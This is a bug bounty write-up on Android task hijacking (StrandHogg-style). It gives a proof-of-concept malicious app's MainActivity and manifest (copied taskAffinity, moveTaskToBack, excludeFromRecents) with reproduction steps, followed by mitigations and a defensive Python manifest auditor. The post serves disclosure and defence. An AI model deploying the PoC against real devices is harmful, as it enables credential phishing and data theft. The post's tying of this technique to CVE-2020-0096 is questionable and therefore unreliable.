Understanding Task Injection Vulnerabilities: A Bug Bounty Perspective

Task Hijacking was first described in a USENIX Security paper in 2015. It is also known as Strandhogg by many researchers.

I have submitted this vulnerability to multiple bug bounty programmes, and it has been rated anywhere from High to Low and Informational. It is a vulnerability that is currently "not accepted" by many programmes because of Android updates. According to StatCounter's Android version statistics, the share of users on Android 9 has fallen below 6%, but I think it can still be used in pentest reports (Cure53 Pentest Report).


Usenix PoC Video

How It Works:

When the user taps an app's icon, the task for that app comes to the foreground. If there is no task for the app, a new task is created and the app's main activity is opened as the root activity of the stack. When an activity starts another activity, the new activity is added to the top of the stack and focused. The previous activity remains in the stack, but is stopped.

When the user performs a back operation, the current activity is removed from the top of the stack and destroyed. The previous activity continues and the previous state of the user interface is restored. Activities in the stack are never reorganised, they are only added to or removed from the stack as they are started and closed by the user with the Back button or gesture.

As the user taps or gestures Back, the stack removes the top activity and displays the previous activity, until the user returns to the Home screen or the activity that was running when the task started. When all activities are removed from the stack, the task no longer exists. ref : Tasks and the back stack - Android Developer


Task Hijacking is a vulnerability that affects applications running on Android devices with task management features, caused by a misconfiguration in the AndroidManifest.xml file. It allows attackers/malware to hijack legitimate applications, steal the user's data, and perform a series of attacks such as:

  • Listen through the microphone
  • Take photos with the camera
  • Read and send SMS messages
  • Make or record phone conversations
  • Phish for login credentials
  • Access private photos and files
  • Obtain location and GPS information
  • Access the contacts list and phone logs

Other important points:

  • This could lead to local escalation of privilege with no additional execution privileges needed.
  • It doesn’t need the target device to be rooted.
  • It doesn’t require any specific permissions.
  • Malicious app minimizes the activity and hides itself from the popup in the overview screen.

Code Example: Here is a snippet of the malicious app's MainActivity.java source code, demonstrating how it operates:


package com.example.taskinjection;

import android.os.Bundle;

import androidx.appcompat.app.AppCompatActivity;

public class MainActivity extends AppCompatActivity {

    @Override
    protected void onCreate(Bundle savedInstanceState) {
        super.onCreate(savedInstanceState);
        setContentView(R.layout.taskinjection);
        // Immediately send the task to the background, so the user sees
        // nothing after launching the app.
        moveTaskToBack(true);
    }

    @Override
    protected void onResume() {
        super.onResume();
        // Re-inflate the layout every time the activity returns to the
        // foreground (e.g. when it is brought up inside the hijacked task).
        setContentView(R.layout.taskinjection);
    }
}

And the corresponding AndroidManifest.xml file:

<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.taskinjection"
    android:versionCode="1"
    android:versionName="1.0" >

    <application
        android:allowBackup="true"
        android:icon="@mipmap/ic_launcher"
        android:label="@string/app_name"
        android:roundIcon="@mipmap/ic_launcher_round"
        android:supportsRtl="true"
        android:theme="@style/Theme.Taskinjection"
        android:taskAffinity="com.x.x">
        <activity
            android:name=".MainActivity"
            android:launchMode="singleTask"
            android:excludeFromRecents="true">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
    </application>

</manifest>

In this vulnerability, there are two types of hijacking state transitions:

1- The malware replaces the activity of any target application.
2- When the user presses the Back button, the legitimate application's activity is popped from the stack and the malware activity moves to the foreground.

Steps:
- Run the target Android app (X) and clear everything from your overview screen.
- Run the malicious app. The "moveTaskToBack" call minimizes the activity, and the "excludeFromRecents" attribute hides the application from the overview screen.
- Launch app X again: although X is what was tapped, the malicious application's activity is what appears in the foreground.

Mitigation:

- Add android:taskAffinity="" to the <activity> tag in AndroidManifest.xml (or to the <application> tag, which sets the default for every activity in the app).
- If the application runs on an older Android OS version/security patch level, a security notice can be shown and/or the application can refuse to run.
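The first mitigation is easy to check for in a static review of the manifest. The following is an added example for this post, not code from the original article: a small Python auditor that resolves the effective android:taskAffinity of every activity the way Android does (activity attribute, else application attribute, else the package name) and reports any activity whose affinity is not the empty string. The three manifests it checks are constructed samples for a hypothetical package com.example.victim; the "weak" one relies on the default affinity, the "partial" one fixes only one activity, and the "fixed" one applies android:taskAffinity="" at the application level.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"


def _android_attr(elem, name):
    """Read an attribute from the android: namespace (None if absent)."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def effective_task_affinity(manifest_xml):
    """Map each activity's fully-qualified name to the task affinity Android
    will actually use for it.

    Resolution order (per the Android manifest documentation): the activity's
    own android:taskAffinity, else the <application> android:taskAffinity,
    else the package name. An empty string means "no affinity", which keeps
    activities from other apps out of this app's task.
    """
    root = ET.fromstring(manifest_xml)
    package = root.get("package", "")
    app = root.find("application")
    if app is None:
        return {}
    app_affinity = _android_attr(app, "taskAffinity")
    affinities = {}
    for activity in app.iter("activity"):
        name = _android_attr(activity, "name") or ""
        if name.startswith("."):  # shorthand relative to the package name
            name = package + name
        own = _android_attr(activity, "taskAffinity")
        if own is not None:
            affinity = own
        elif app_affinity is not None:
            affinity = app_affinity
        else:
            affinity = package
        affinities[name] = affinity
    return affinities


def audit_task_affinity(manifest_xml):
    """Return one finding per activity whose effective affinity is not "".

    Conservative rule: every non-empty affinity is reported, because that is
    exactly the value another app can copy into its own android:taskAffinity
    to have its activity placed into this app's task.
    """
    findings = []
    for name, affinity in effective_task_affinity(manifest_xml).items():
        if affinity != "":
            findings.append(
                '%s: taskAffinity resolves to "%s"; set android:taskAffinity=""'
                % (name, affinity)
            )
    return findings


# Constructed sample: a victim app that relies on the default affinity.
WEAK_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.victim">
    <application android:label="Victim">
        <activity android:name=".MainActivity">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <activity android:name=".LoginActivity" />
    </application>
</manifest>
"""

# Constructed sample: only LoginActivity fixed; MainActivity is still reported.
PARTIAL_MANIFEST = WEAK_MANIFEST.replace(
    '<activity android:name=".LoginActivity" />',
    '<activity android:name=".LoginActivity" android:taskAffinity="" />',
)

# Constructed sample: mitigation applied at <application> level, which sets
# the default for every activity it contains.
FIXED_MANIFEST = WEAK_MANIFEST.replace(
    '<application android:label="Victim">',
    '<application android:label="Victim" android:taskAffinity="">',
)

if __name__ == "__main__":
    for label, manifest in (("weak", WEAK_MANIFEST),
                            ("partial", PARTIAL_MANIFEST),
                            ("fixed", FIXED_MANIFEST)):
        findings = audit_task_affinity(manifest)
        print("%s: %d finding(s)" % (label, len(findings)))
        for line in findings:
            print("  " + line)
```

Run it against a decoded AndroidManifest.xml (after apktool or a similar decoder has turned the binary manifest back into text) to get a per-activity list of what still needs android:taskAffinity="". The check deliberately ignores launchMode and excludeFromRecents, which describe the attacking app's configuration; on the defending side the affinity value is what decides whether a foreign activity can join the task.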

Examples from bug bounty programs:

Some applications refuse to run on rooted devices; if the user wants, they can still proceed.

A similar structure can be used: I ran my taskinjection application and then ran the target application, and it detected the malicious action.

End users can be limited to downloading your application only on the latest Android OS version/security patch level from Google Play. I think this is possible with the uses-sdk element: https://developer.android.com/guide/topics/manifest/uses-sdk-element.html

CVE and CVSS Rating:

This vulnerability is akin to Strandhogg 1.0 and is defined as Strandhogg 2.0 (CVE-2020-0096) in the Android source, with a severity marked as "Critical." The CVSS base score is 7.8, with an impact subscore of 5.9.

References:

CVE-2020-0096 CVSS v3.1 Calculator
Android Security Bulletin - May 2020
Vulmon - CVE-2020-0096 Vulnerability Details
CVE-2020-0096 - MITRE CVE
Android task hijacking using moveTaskToBack() and excludeFromRecents